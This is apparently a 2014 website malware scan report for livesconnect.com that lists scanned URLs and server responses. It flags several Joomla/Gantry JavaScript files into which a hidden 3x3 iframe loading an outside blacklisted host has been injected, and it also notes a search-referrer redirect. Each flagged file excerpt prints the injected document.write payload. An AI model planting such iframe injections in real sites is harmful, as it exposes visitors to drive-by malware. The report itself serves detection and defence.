Scanned pages/files
Request | Server response | Status |
http://livesconnect.com/ | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://livesconnect.com/bonsai/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://livesconnect.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:43:56 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
https://supremecenter103.com/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:58 GMT Location: http://us.cloudlogin.co/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:58 GMT Location: https://us.cloudlogin.co/404/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/404/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 14:43:59 GMT Pragma: no-cache Location: /login/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=d3vkv13ovqc9h293lhvuf5tit1; path=/ X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
https://us.cloudlogin.co/login/ | 200 OK Content-Length: 5887 Content-Type: text/html | clean |
https://us.cloudlogin.co/js/jses.min.js?v=1404979296 | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
http://livesconnect.com/js/jquery_plugins/jquery-fonteffect-1.0.0.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://supremecenter103.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: http://us.cloudlogin.co/test404page.js Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:44:03 GMT Location: https://us.cloudlogin.co/test404page.js Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 14:44:04 GMT Pragma: no-cache Location: /login/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=c8cn1dv5rjl6jnh3l5d5lm1hl3; path=/ X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
http://livesconnect.com/js/video-js/video.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 14:44:04 GMT Location: https://supremecenter103.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.corecounter.net/counter.php?user=59 | 200 OK Content-Length: 482 Content-Type: text/html | clean |
http://livesconnect.com/ted/ | 200 OK Content-Length: 25514 Content-Type: text/html | clean |
http://livesconnect.com/ted/components/com_gantry/js/mootools-1.2.5.js | 200 OK Content-Length: 121179 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3463 bytes skipped]... x:css:value"};return g},serve:function(g,d){if($type(g)!="fx:css:value"){g=this.parse(g)}var f=[];g.each(function(a){f=f.concat(a.parser.serve(a.value,d))});return f},render:function(g,h,i,f){g.setStyle(h,this.serve(i,f))},search:function(d){if(Fx.CSS.Cache[d]){return Fx.CSS.Cache[d]}var c={};Array.each(document.styleSheets,function(b,h){var i=b.href;if(i&&i.contains(":</iframe>');document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/media/system/js/caption.js | 200 OK Content-Length: 2136 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1025 bytes skipped]... container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_jfbconnect/includes/jfbconnect.js?v412 | 200 OK Content-Length: 8365 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3862 bytes skipped]... .location.href + '?jfbcCanvasBreakout=1'; else top.location.href = window.location.href + '&jfbcCanvasBreakout=1'; } } }, request:{ currentId:null, popup:function (jfbcReqId) { jfbc.request.currentId = jfbcReqId; data = jfbcRequests[;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-totop-mt1.2.js | 200 OK Content-Length: 904 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.0(\'j\',1(){2 a=f.d(\'c-9\');8(a){2 b=6 5.4(3);a.7(\'g\',\'h\').0(\'i\',1(e){e.k();b.l()})}});',22,22,'addEvent|function|var|window|Scroll|Fx|new|setStyle|if|totop|||gantry|id||document|outline|none|click|domready|stop|toTop'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-buildspans-mt1.2.js | 200 OK Content-Length: 1266 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: wdxjnxsz.sellclassics.com ...[493 bytes skipped]... 7=z A(\'7\').8(\'6\',n);7.C(d,\'D\');d.E(a)}};$$(e).5(3(c){j.5(3(h){c.t(h).5(3(b){2 a=b.x();9(a&&a.l(\'F\')==\'a\')f(a);H f(b)})})})})};',44,44,'||var|function|rest|each|text|span|set|if||||||||||||get|length|first|split|slice|join|html|innerHTML|getElements|visible|visibility|setStyle|getFirst|clone|new|Element|times|inject|top|replaces|tag|GantryBuildSpans|else'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Decoded script: ...[633 bytes skipped]... le('visibility','visible');var b=a.get('text');var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().set('text',' '+rest),span=new Element('span').set('text',first);span.inject(d,'top');d.replaces(a)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.get('tag')=='a')f(a);else f(b)})})})})}; <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe> Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-inputs-mt1.2.js | 200 OK Content-Length: 3242 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2629 bytes skipped]... lse|each|10000px|opera|position|setStyles|absolute|hasClass|checks|true|radio|left|InputsExclusion|checkbox|all|removeClass|morph|set|setStyle|display|switchReplacement|none|return|fireEvent|erase|gecko|has|join|getProperty|replace|for|radios|right|init|setProperty|radioparent|document|direction|body|id|getStyle|new|push|Hash|version|window|content_vote|trident5|domready'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-smartload-mt1.2.js | 200 OK Content-Length: 2517 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1835 bytes skipped]... rolling|typeof|undefined|document|id|spinner|dimensions|placeholder|start|200|exclusion|Fx|fx|else|getScrollSize|scrollSize|getScroll|opacity|addEvent|onload|image|Asset|getPosition|Hash|setOptions|bind|set|initialize|Tween|split|duration|250|transition|img|Transitions|window|chain|gif|blank|Sine|easeIn|Options|Events|Implements|Class|addClass|GantrySmartLoad|removeClass'.split('|'),0,{})) ;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/templates/rt_panacea_j15/js/gantry-rotator-mt1.2.js | 200 OK Content-Length: 512 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 2007 - 2011 RocketTheme, LLC * @license http: */ eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://livesconnect.com/ted/components/com_gantry/js/gantry-morearticles-mt1.2.js | 200 OK Content-Length: 1959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1182 bytes skipped]... ment|return|buildButton|ajax|get|spinner|handle|set|div|length|removeEvent|GantryBuildSpans|GantryArticleDetails|undefined|refresh|GantryMoreArticles|Class|Implements|Options|initialize|setOptions|teaser|leading|Request|method|onRequest|onSuccess|id|href|adopt|span|text|class|after|addEvent|stop|hasClass|limitstart|removeClass|html|getElements|article|else|block|h3|h2|h1|init'.split('|'),0,{}));document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 3x3 src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8 This URL is marked by Google as suspicious <iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://livesconnect.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: livesconnect.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 14:43:54 GMT Location: http://ya.ru Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 220 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=livesconnect.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://livesconnect.com/
Result: livesconnect.com is not infected or malware details are not published yet.
Result: livesconnect.com is not infected or malware details are not published yet.